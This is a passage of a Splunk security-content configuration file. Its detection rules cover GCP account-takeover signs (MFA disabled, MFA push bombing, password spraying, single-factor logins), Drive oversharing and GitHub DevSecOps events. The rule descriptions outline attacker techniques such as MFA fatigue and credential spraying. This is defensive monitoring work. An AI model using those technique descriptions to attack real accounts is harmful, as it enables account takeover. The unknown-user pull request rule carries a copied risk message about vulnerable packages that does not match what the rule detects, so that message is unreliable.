action.notable.param.rule_title = GCP Multi-Factor Authentication Disabled action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_admin` command=UNENROLL_USER_FROM_STRONG_AUTH | stats count min(_time) as firstTime max(_time) as lastTime by user, command, actor.email, status, id.applicationName, event.name, vendor_account, action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `gcp_multi_factor_authentication_disabled_filter` [ESCU - GCP Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. We would also recommend tuning the detection by adjusting the window `span` and `mfa_prompts` threshold values according to your environment. Specifically, this analytic leverages the User log events. action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed. 
action.escu.creation_date = 2022-10-14 action.escu.modification_date = 2022-10-14 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple Failed MFA requests for user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. 
The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.notable.param.rule_title = GCP Multiple Failed MFA Requests For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) AS user by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter` [ESCU - GCP Multiple Users Failing To Authenticate From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source Ip failing to authenticate into the Google Workspace user accounts with more than 20 unique valid users within 5 minutes. These user accounts may have other privileges with respect to access to other sensitive resources in the Google Cloud Platform. This behavior could represent an adversary performing a Password Spraying attack against an Google Workspace environment to obtain initial access or elevate privileges. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source Ip failing to authenticate into the Google Workspace user accounts with more than 20 unique valid users within 5 minutes. These user accounts may have other privileges with respect to access to other sensitive resources in the Google Cloud Platform. This behavior could represent an adversary performing a Password Spraying attack against an Google Workspace environment to obtain initial access or elevate privileges. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. We would also recommend tuning the detection by adjusting the window `span` and `unique_accounts` threshold values according to your environment. Specifically, this analytic leverages the User log events. action.escu.known_false_positives = No known false postives for this detection. Please review this alert. 
action.escu.creation_date = 2022-10-12
action.escu.modification_date = 2022-10-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - GCP Multiple Users Failing To Authenticate From Ip - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"]
action.escu.analytic_story = ["GCP Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Multiple failed login attempts against users $tried_accounts$ seen from $src$
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GCP Multiple Users Failing To Authenticate From Ip - Rule
action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `gws_reports_login` event.type = login event.name = login_failure | bucket span=5m _time | stats count dc(user) AS unique_accounts values(user) as tried_accounts values(authentication_method) AS authentication_method earliest(_time) as firstTime latest(_time) as lastTime by _time event.name src app id.applicationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where unique_accounts > 20 | `gcp_multiple_users_failing_to_authenticate_from_ip_filter`

[ESCU - GCP Successful Single-Factor Authentication - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a successful authentication event against Google Cloud Platform for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation, or an account takeover attempt that should be investigated.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a successful authentication event against Google Cloud Platform for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation, or an account takeover attempt that should be investigated.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. Specifically, this analytic leverages the User log events.
action.escu.known_false_positives = Although not recommended, certain users may be required to authenticate without multi-factor authentication. Filter as needed.
action.escu.creation_date = 2024-01-04
action.escu.modification_date = 2024-01-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - GCP Successful Single-Factor Authentication - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"]
action.escu.analytic_story = ["GCP Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Successful authentication for user $user$ without MFA
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GCP Successful Single-Factor Authentication - Rule
action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a successful authentication event against Google Cloud Platform for an account without Multi-Factor Authentication enabled. This could be evidence of a misconfiguration, a policy violation, or an account takeover attempt that should be investigated.
action.notable.param.rule_title = GCP Successful Single-Factor Authentication
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `gws_reports_login` event.name=login_success NOT `gws_login_mfa_methods` | stats count min(_time) as firstTime max(_time) as lastTime by user, src_ip, login_challenge_method, app, event.name, vendor_account, action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `gcp_successful_single_factor_authentication_filter`

[ESCU - GCP Unusual Number of Failed Authentications From Ip - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies one source IP failing to authenticate into Google Workspace with multiple valid users. This behavior could represent an adversary performing a password spraying attack against a Google Workspace environment to obtain initial access or elevate privileges. The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the bucket span time and the calculation of the upperBound field. This logic can be used for real time security monitoring as well as threat hunting exercises. While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `GCP Multiple Users Failing To Authenticate From Ip`.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies one source IP failing to authenticate into Google Workspace with multiple valid users. This behavior could represent an adversary performing a password spraying attack against a Google Workspace environment to obtain initial access or elevate privileges. The detection calculates the standard deviation for source IP and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the bucket span time and the calculation of the upperBound field. This logic can be used for real time security monitoring as well as threat hunting exercises. While looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `GCP Multiple Users Failing To Authenticate From Ip`.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. We also recommend tuning the detection by adjusting the window `span` and `unique_accounts` threshold values according to your environment. Specifically, this analytic leverages the User log events.
action.escu.known_false_positives = No known false positives for this detection. Please review this alert.
action.escu.creation_date = 2022-10-13
action.escu.modification_date = 2022-10-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - GCP Unusual Number of Failed Authentications From Ip - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"]
action.escu.analytic_story = ["GCP Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Unusual number of failed console login attempts against users $tried_accounts$ seen from $src$
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GCP Unusual Number of Failed Authentications From Ip - Rule
action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `gws_reports_login` event.type = login event.name = login_failure | bucket span=5m _time | stats dc(user_name) AS unique_accounts values(user_name) as tried_accounts values(authentication_method) AS authentication_method by _time, src | eventstats avg(unique_accounts) as ip_avg , stdev(unique_accounts) as ip_std by _time | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | where isOutlier =1 | `gcp_unusual_number_of_failed_authentications_from_ip_filter`

[ESCU - Gdrive suspicious file sharing - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search can help detect compromised accounts or internal users sharing potentially malicious/classified documents with users outside your organization via GSuite file sharing.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search can help detect compromised accounts or internal users sharing potentially malicious/classified documents with users outside your organization via GSuite file sharing.
action.escu.how_to_implement = You need to implement GSuite logging that covers Google Drive activity. In order for the search to work in your environment, update the `yourdomain.com` value in the query with the domain relevant to your organization.
action.escu.known_false_positives = This is an anomaly search; you must specify your domain in the parameters so it either filters outside domains or focuses on internal domains. This search may also help investigate compromised accounts, for example by looking at source IP addresses, document titles, and an abnormal number of shares and shared target users.
action.escu.creation_date = 2021-10-24
action.escu.modification_date = 2021-10-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - Gdrive suspicious file sharing - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"]
action.escu.analytic_story = ["Spearphishing Attachments", "Data Exfiltration"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Gdrive suspicious file sharing - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `gsuite_drive` name=change_user_access | rename parameters.* as * | search email = "*@yourdomain.com" target_user != "*@yourdomain.com" | stats count values(owner) as owner values(target_user) as target values(doc_type) as doc_type values(doc_title) as doc_title dc(target_user) as distinct_target by src_ip email | where distinct_target > 50 | `gdrive_suspicious_file_sharing_filter`

[ESCU - GitHub Actions Disable Security Workflow - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a disabled security workflow in GitHub Actions. An attacker can disable a security workflow in GitHub Actions to hide malicious code in it.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002", "T1195"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search detects a disabled security workflow in GitHub Actions. An attacker can disable a security workflow in GitHub Actions to hide malicious code in it.
action.escu.how_to_implement = You must index GitHub logs. You can follow the URL in the references to onboard GitHub logs. GitHub logs are sometimes truncated; make sure to disable truncation in props.conf. Replace *security-testing* with the name of your security testing workflow in GitHub Actions.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2022-04-04
action.escu.modification_date = 2022-04-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - GitHub Actions Disable Security Workflow - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Security Workflow is disabled in branch $branch$ for repository $repository$
action.risk.param._risk = [{"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 27}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GitHub Actions Disable Security Workflow - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002", "T1195"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `github` workflow_run.event=push OR workflow_run.event=pull_request | stats values(workflow_run.name) as workflow_run.name by workflow_run.head_commit.id workflow_run.event workflow_run.head_branch workflow_run.head_commit.author.email workflow_run.head_commit.author.name workflow_run.head_commit.message workflow_run.head_commit.timestamp workflow_run.head_repository.full_name workflow_run.head_repository.owner.id workflow_run.head_repository.owner.login workflow_run.head_repository.owner.type | rename workflow_run.head_commit.author.name as user, workflow_run.head_commit.author.email as user_email, workflow_run.head_repository.full_name as repository, workflow_run.head_branch as branch | search NOT workflow_run.name=*security-testing* | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_actions_disable_security_workflow_filter`

[ESCU - Github Commit Changes In Master - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a push or commit to the master or main branch. This is to avoid unwanted modification to master without a review of the changes. Ideally, in terms of DevSecOps, changes are made in a branch and submitted as a PR for review. Of course, in some cases an admin of the project may make changes directly to the master branch.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1199"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search detects a push or commit to the master or main branch. This is to avoid unwanted modification to master without a review of the changes. Ideally, in terms of DevSecOps, changes are made in a branch and submitted as a PR for review. Of course, in some cases an admin of the project may make changes directly to the master branch.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting GitHub logs that include the fork, commit, and push metadata that can be used to monitor changes in a GitHub project.
action.escu.known_false_positives = An admin can make changes directly to the master branch.
action.escu.creation_date = 2021-08-20
action.escu.modification_date = 2021-08-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Github Commit Changes In Master - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = suspicious commit by $commit.commit.author.email$ to main branch
action.risk.param._risk = [{"risk_object_field": "commit.commit.author.email", "risk_object_type": "other", "risk_score": 9}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Github Commit Changes In Master - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1199"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `github` branches{}.name = main OR branches{}.name = master | stats count min(_time) as firstTime max(_time) as lastTime by commit.commit.author.email commit.author.login commit.commit.message repository.pushed_at commit.commit.committer.date repository.full_name | rename commit.author.login as user, repository.full_name as repository | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_commit_changes_in_master_filter`

[ESCU - Github Commit In Develop - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a push or commit to the develop branch. This is to avoid unwanted modification to develop without a review of the changes. Ideally, in terms of DevSecOps, changes are made in a branch and submitted as a PR for review. Of course, in some cases an admin of the project may make changes directly to the master branch.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1199"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search detects a push or commit to the develop branch. This is to avoid unwanted modification to develop without a review of the changes. Ideally, in terms of DevSecOps, changes are made in a branch and submitted as a PR for review. Of course, in some cases an admin of the project may make changes directly to the master branch.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting GitHub logs that include the fork, commit, and push metadata that can be used to monitor changes in a GitHub project.
action.escu.known_false_positives = An admin can make changes directly to the develop branch.
action.escu.creation_date = 2021-09-01
action.escu.modification_date = 2021-09-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Github Commit In Develop - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = suspicious commit by $commit.commit.author.email$ to develop branch
action.risk.param._risk = [{"risk_object_field": "commit.commit.author.email", "risk_object_type": "other", "risk_score": 9}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Github Commit In Develop - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1199"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `github` branches{}.name = main OR branches{}.name = develop | stats count min(_time) as firstTime max(_time) as lastTime by commit.author.html_url commit.commit.author.email commit.author.login commit.commit.message repository.pushed_at commit.commit.committer.date | eval phase="code" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_commit_in_develop_filter`

[ESCU - GitHub Dependabot Alert - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic is made by first searching for logs that contain the action "create" and renaming certain fields for easier analysis. Then, this analytic uses the "stats" command to calculate the first and last occurrence of the alert based on the timestamp. The fields included in the output are the action, affected package name, affected range, created date, external identifier, external reference, fixed version, severity, repository, repository URL, and user. The "phase" field is set to "code" to indicate that the alert pertains to code-related issues. The detection is important because Dependabot alerts can indicate vulnerabilities in the codebase that can be exploited by attackers. Detecting and investigating these alerts can help a SOC to proactively address security risks and prevent potential breaches or unauthorized access to sensitive information. False positives might occur since there are legitimate actions that trigger the "create" action or if other factors exist that can generate similar log entries. Next steps include reviewing the details of the alert, such as the affected package, severity, and fixed version, to determine the appropriate response and mitigation steps.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.001", "T1195"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic is made by first searching for logs that contain the action "create" and renaming certain fields for easier analysis. Then, this analytic uses the "stats" command to calculate the first and last occurrence of the alert based on the timestamp. The fields included in the output are the action, affected package name, affected range, created date, external identifier, external reference, fixed version, severity, repository, repository URL, and user. The "phase" field is set to "code" to indicate that the alert pertains to code-related issues. The detection is important because Dependabot alerts can indicate vulnerabilities in the codebase that can be exploited by attackers. Detecting and investigating these alerts can help a SOC to proactively address security risks and prevent potential breaches or unauthorized access to sensitive information. False positives might occur since there are legitimate actions that trigger the "create" action or if other factors exist that can generate similar log entries. Next steps include reviewing the details of the alert, such as the affected package, severity, and fixed version, to determine the appropriate response and mitigation steps.
action.escu.how_to_implement = You must index GitHub logs. You can follow the URL in the references to onboard GitHub logs.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-01
action.escu.modification_date = 2021-09-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - GitHub Dependabot Alert - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Vulnerabilities found in packages used by GitHub repository $repository$
action.risk.param._risk = [{"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 27}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - GitHub Dependabot Alert - Rule
action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 30, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.001", "T1195"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `github` alert.id=* action=create | rename repository.full_name as repository, repository.html_url as repository_url sender.login as user | stats min(_time) as firstTime max(_time) as lastTime by action alert.affected_package_name alert.affected_range alert.created_at alert.external_identifier alert.external_reference alert.fixed_in alert.severity repository repository_url user | eval phase="code" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `github_dependabot_alert_filter`

[ESCU - GitHub Pull Request from Unknown User - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects pull requests from unknown users on GitHub. The detection is made by using a Splunk query to search for pull requests in the `check_suite.pull_requests` field where the `id` is not specified. Next, the analytic retrieves information such as the author's name, the repository's full name, the head reference of the pull request, and the commit message from the `check_suite.head_commit` field. The analytic also includes a step to exclude known users by using the `github_known_users` lookup table, which helps to filter out pull requests from known users and focus on the pull requests from unknown users. The detection is important because it locates potential malicious activity or unauthorized access, since unknown users can introduce malicious code or gain unauthorized access to repositories, leading to unauthorized code changes, data breaches, or other security incidents. Next steps include reviewing the author's name, the repository involved, the head reference of the pull request, and the commit message upon triage of a potential pull request from an unknown user. You must also analyze any relevant on-disk artifacts and investigate any concurrent processes to determine the source and intent of the pull request.
action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.001", "T1195"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects pull requests from unknown users on GitHub. The detection is made by using a Splunk query to search for pull requests in the `check_suite.pull_requests` field where the `id` is not specified. Next, the analytic retrieves information such as the author's name, the repository's full name, the head reference of the pull request, and the commit message from the `check_suite.head_commit` field. The analytic also includes a step to exclude known users by using the `github_known_users` lookup table, which helps to filter out pull requests from known users and focus on the pull requests from unknown users. The detection is important because it locates potential malicious activity or unauthorized access, since unknown users can introduce malicious code or gain unauthorized access to repositories, leading to unauthorized code changes, data breaches, or other security incidents. Next steps include reviewing the author's name, the repository involved, the head reference of the pull request, and the commit message upon triage of a potential pull request from an unknown user. You must also analyze any relevant on-disk artifacts and investigate any concurrent processes to determine the source and intent of the pull request.
action.escu.how_to_implement = You must index GitHub logs. You can follow the URL in the references to onboard GitHub logs.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-01
action.escu.modification_date = 2021-09-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - GitHub Pull Request from Unknown User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Dev Sec Ops"]
action.risk = 1
action.risk.param._risk_message = Vulnerabilities found in packages used by GitHub repository $repository$
action.risk.param._risk = [{"risk_object_field": "repository", "risk_object_type": "other", "risk_score": 27}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
